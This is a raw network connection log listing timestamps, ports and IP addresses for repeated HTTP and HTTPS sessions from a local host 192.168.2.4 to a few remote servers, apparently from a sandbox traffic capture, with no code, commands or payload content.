Feb 25, 2025 08:27:39.670793056 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.670821905 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.671003103 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.672410965 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.672472954 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.672544956 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.672694921 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.674177885 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.674256086 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.674264908 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.674333096 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.676204920 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.676388025 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.676403046 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.676440001 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.677397966 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.677453041 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.677458048 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.677512884 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.678888083 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.678949118 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.679023981 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.679059029 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.680507898 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.680566072 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.680582047 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.680622101 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.681966066 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.682017088 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.682115078 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.682163954 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.683561087 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.683612108 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.683640957 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.683691978 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.685125113 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.685192108 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.685204983 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.685292006 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.686487913 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.686541080 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.686625004 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.686670065 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.687994003 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.688158035 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.688174009 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.688215017 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.689343929 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.689418077 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.689430952 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.689482927 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.690689087 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.690762043 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.690788984 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.690844059 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.690860987 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.690927029 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.692152977 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.692200899 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.692236900 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.692284107 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.693437099 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.693496943 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.693592072 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.693634987 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.694802046 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.694864035 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.694936991 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.695049047 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.696068048 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.696115971 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.696192980 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.696285963 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.697571993 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.697695017 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.697705030 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.697747946 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.698709965 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.698765993 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.698791981 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.698832989 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.700215101 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.700258017 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.700361967 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.700413942 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.700453043 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.700500011 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.700536966 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.700579882 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.700591087 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.700639009 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:40.372189045 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:40.377310991 CET | 80 | 49812 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:40.377404928 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:40.377614021 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:40.382644892 CET | 80 | 49812 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:40.949151993 CET | 80 | 49812 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:40.973191023 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:40.978277922 CET | 80 | 49812 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:41.130731106 CET | 80 | 49812 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:41.175107956 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:41.692517042 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:41.692554951 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:41.694996119 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:41.696948051 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:41.696966887 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.165481091 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.165582895 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:42.179081917 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:42.179106951 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.179506063 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.204638958 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:42.251332045 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.309708118 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.309775114 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.311794996 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:42.329853058 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:42.383109093 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:42.388205051 CET | 80 | 49812 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:42.539824009 CET | 80 | 49812 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:42.542406082 CET | 49828 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:42.542443991 CET | 443 | 49828 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.542511940 CET | 49828 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:42.542782068 CET | 49828 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:42.542792082 CET | 443 | 49828 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.581340075 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:43.007395029 CET | 443 | 49828 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:43.009630919 CET | 49828 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:43.009660006 CET | 443 | 49828 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:43.138787985 CET | 443 | 49828 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:43.138855934 CET | 443 | 49828 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:43.138957977 CET | 49828 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:43.139571905 CET | 49828 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:43.168668985 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:43.169847965 CET | 49830 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:43.173890114 CET | 80 | 49812 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:43.174906969 CET | 80 | 49830 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:43.174988985 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:43.175010920 CET | 49830 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:43.175154924 CET | 49830 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:43.180145025 CET | 80 | 49830 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:43.748409033 CET | 80 | 49830 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:43.750921011 CET | 49836 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:43.750972033 CET | 443 | 49836 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:43.751058102 CET | 49836 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:43.751351118 CET | 49836 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:43.751363993 CET | 443 | 49836 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:43.800116062 CET | 49830 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:44.214688063 CET | 443 | 49836 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:44.216445923 CET | 49836 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:44.216490984 CET | 443 | 49836 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:44.342020035 CET | 443 | 49836 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:44.342082977 CET | 443 | 49836 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:44.342243910 CET | 49836 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:44.342799902 CET | 49836 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:44.378653049 CET | 49842 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:44.383780003 CET | 80 | 49842 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:44.383886099 CET | 49842 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:44.384087086 CET | 49842 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:44.389166117 CET | 80 | 49842 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:44.989926100 CET | 80 | 49842 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:45.000030994 CET | 49848 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:45.000080109 CET | 443 | 49848 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:45.000176907 CET | 49848 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:45.009841919 CET | 49848 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:45.009860039 CET | 443 | 49848 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:45.034451008 CET | 49842 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:45.463206053 CET | 443 | 49848 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:45.464946985 CET | 49848 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:45.465001106 CET | 443 | 49848 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:45.588211060 CET | 443 | 49848 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:45.588272095 CET | 443 | 49848 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:45.588339090 CET | 49848 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:45.588833094 CET | 49848 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:45.611151934 CET | 49842 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:45.612077951 CET | 49851 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:45.616405964 CET | 80 | 49842 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:45.616508007 CET | 49842 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:45.617150068 CET | 80 | 49851 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:45.617261887 CET | 49851 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:45.617341042 CET | 49851 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:45.622323036 CET | 80 | 49851 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:46.190720081 CET | 80 | 49851 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:46.194797993 CET | 49855 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:46.194843054 CET | 443 | 49855 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:46.194926977 CET | 49855 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:46.195255041 CET | 49855 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:46.195266962 CET | 443 | 49855 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:46.237597942 CET | 49851 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:46.649776936 CET | 443 | 49855 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:46.653449059 CET | 49855 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:46.653476000 CET | 443 | 49855 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:46.775712013 CET | 443 | 49855 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:46.775774002 CET | 443 | 49855 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:46.775939941 CET | 49855 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:46.782213926 CET | 49855 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:46.817718983 CET | 49851 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:46.818741083 CET | 49860 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:46.823026896 CET | 80 | 49851 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:46.823493958 CET | 49851 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:46.823796988 CET | 80 | 49860 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:46.823885918 CET | 49860 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:46.823997021 CET | 49860 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:46.829019070 CET | 80 | 49860 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:47.759228945 CET | 80 | 49860 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:47.760519028 CET | 49865 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:47.760623932 CET | 443 | 49865 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:47.760974884 CET | 49865 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:47.761214972 CET | 49865 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:47.761255026 CET | 443 | 49865 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:47.800198078 CET | 49860 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:48.215955973 CET | 443 | 49865 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:48.217892885 CET | 49865 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:48.217966080 CET | 443 | 49865 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:48.365029097 CET | 443 | 49865 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:48.365098000 CET | 443 | 49865 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:48.365164995 CET | 49865 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:48.365772963 CET | 49865 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:48.396749020 CET | 49860 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:48.398072958 CET | 49870 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:48.401915073 CET | 80 | 49860 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:48.401995897 CET | 49860 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:48.403167009 CET | 80 | 49870 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:48.403239965 CET | 49870 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:48.403321981 CET | 49870 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:48.408318996 CET | 80 | 49870 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:48.987392902 CET | 80 | 49870 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:48.989368916 CET | 49875 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:48.989437103 CET | 443 | 49875 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:48.989540100 CET | 49875 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:48.989917040 CET | 49875 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:48.989929914 CET | 443 | 49875 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:49.034456015 CET | 49870 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:49.445765018 CET | 443 | 49875 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:49.451344967 CET | 49875 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:49.451365948 CET | 443 | 49875 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:49.591371059 CET | 443 | 49875 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:49.591449022 CET | 443 | 49875 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:49.591600895 CET | 49875 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:49.592293024 CET | 49875 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:49.615993023 CET | 49870 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:49.617353916 CET | 49881 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:49.621201992 CET | 80 | 49870 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:49.621264935 CET | 49870 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:49.622365952 CET | 80 | 49881 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:49.625049114 CET | 49881 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:49.625124931 CET | 49881 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:49.630855083 CET | 80 | 49881 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:50.713785887 CET | 80 | 49881 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:50.715585947 CET | 49887 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:50.715636015 CET | 443 | 49887 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:50.715714931 CET | 49887 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:50.716027975 CET | 49887 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:50.716047049 CET | 443 | 49887 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:50.768923998 CET | 49881 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:51.178220034 CET | 443 | 49887 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:51.179893017 CET | 49887 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:51.179932117 CET | 443 | 49887 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:51.324511051 CET | 443 | 49887 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:51.324584961 CET | 443 | 49887 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:51.324688911 CET | 49887 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:51.325311899 CET | 49887 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:51.367939949 CET | 49881 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:51.369010925 CET | 49893 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:51.373182058 CET | 80 | 49881 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:51.374068022 CET | 80 | 49893 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:51.374119997 CET | 49881 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:51.374160051 CET | 49893 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:51.374267101 CET | 49893 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:51.379240990 CET | 80 | 49893 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:51.957364082 CET | 80 | 49893 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:51.958853006 CET | 49899 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:51.958887100 CET | 443 | 49899 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:51.958981991 CET | 49899 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:51.959286928 CET | 49899 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:51.959296942 CET | 443 | 49899 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:52.003212929 CET | 49893 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:52.413939953 CET | 443 | 49899 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:52.415852070 CET | 49899 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:52.415894032 CET | 443 | 49899 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:52.556088924 CET | 443 | 49899 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:52.556150913 CET | 443 | 49899 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:52.556202888 CET | 49899 | 443 | 192.168.2.4 | 104.21.96.1 |
